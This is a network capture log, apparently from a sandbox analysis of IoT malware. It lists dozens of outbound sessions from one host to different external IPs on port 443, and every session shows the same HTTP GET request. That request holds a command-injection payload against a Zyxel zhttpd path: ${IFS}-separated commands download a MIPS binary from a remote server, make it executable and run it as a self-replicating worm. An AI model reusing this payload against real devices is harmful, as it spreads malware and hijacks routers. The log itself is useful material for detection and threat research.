                                                            Jan 28, 2024 10:12:29.570256948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            611192.168.2.1355478195.195.202.129443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570307016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            612192.168.2.134814295.229.208.138443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570343971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            613192.168.2.1333368184.220.54.196443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570357084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            614192.168.2.133427446.154.249.163443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570405006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            615192.168.2.1348158113.8.5.229443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570489883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            616192.168.2.1358392163.162.3.68443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570538044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            617192.168.2.134232292.246.73.7443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570570946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            618192.168.2.1357008137.173.221.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570574999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            619192.168.2.135043032.39.142.162443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570570946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            620192.168.2.1333012160.219.41.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570605993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            621192.168.2.133730273.127.87.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570658922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            622192.168.2.1350664130.77.196.76443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570709944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            623192.168.2.1349848161.102.174.230443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570730925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            624192.168.2.1348440153.156.34.191443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570782900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            625192.168.2.133479634.1.62.208443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570801973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            626192.168.2.13506748.82.98.216443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570852041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            627192.168.2.1357630120.224.206.88443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570904970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            628192.168.2.1347188146.44.133.170443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570983887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            629192.168.2.1344334119.202.105.128443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571032047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            630192.168.2.134236442.15.224.127443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571038961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            631192.168.2.134575049.235.161.66443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571055889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            632192.168.2.1345960207.96.50.150443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571064949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            633192.168.2.1351476112.114.218.97443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571088076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            634192.168.2.1339024216.3.37.159443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571166992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            635192.168.2.1352216108.125.230.197443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571239948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            636192.168.2.1340878123.67.227.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571286917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            637192.168.2.1355928194.42.180.126443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571338892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            638192.168.2.1349580202.236.88.81443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571378946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            639192.168.2.134853485.31.86.31443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571424007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            640192.168.2.135766698.85.100.118443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571450949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            641192.168.2.134247246.109.229.15443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571456909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            642192.168.2.1335452143.126.232.175443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571511030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            643192.168.2.134483887.15.161.230443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571523905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            644192.168.2.1342784159.157.1.196443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571562052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            645192.168.2.134342035.159.96.165443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571609020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            646192.168.2.1336238118.138.208.102443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571645021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            647192.168.2.1352702110.8.56.22443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571677923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            648192.168.2.1337396108.123.112.63443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571722031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            649192.168.2.134104649.145.100.116443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571759939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            650192.168.2.1341092194.63.64.129443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571784019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            651192.168.2.1359492126.87.250.211443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571841002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            652192.168.2.134911427.4.51.104443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571866989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            653192.168.2.135622694.9.240.30443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571891069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            654192.168.2.1341558175.249.155.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571947098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            655192.168.2.1336484103.243.76.90443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.571969032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            656192.168.2.1348642154.114.0.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572016001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            657192.168.2.135389273.118.102.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572062969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            658192.168.2.133955468.167.73.226443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572086096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            659192.168.2.1350192174.246.248.234443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572134972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            660192.168.2.1334422106.38.25.28443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572180033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            661192.168.2.1358666113.249.187.251443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572204113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            662192.168.2.1348920131.37.7.111443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572258949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            663192.168.2.134932042.85.82.118443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572269917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            664192.168.2.133568634.197.91.1443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572341919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            665192.168.2.134372658.40.66.231443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572360039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            666192.168.2.134400632.23.214.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572393894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            667192.168.2.135126641.162.246.131443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572479010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            668192.168.2.1341468148.171.11.87443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572504997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            669192.168.2.133584025.38.31.228443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572527885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            670192.168.2.1337390179.202.248.118443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572559118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            671192.168.2.1344920208.63.149.254443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572602034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
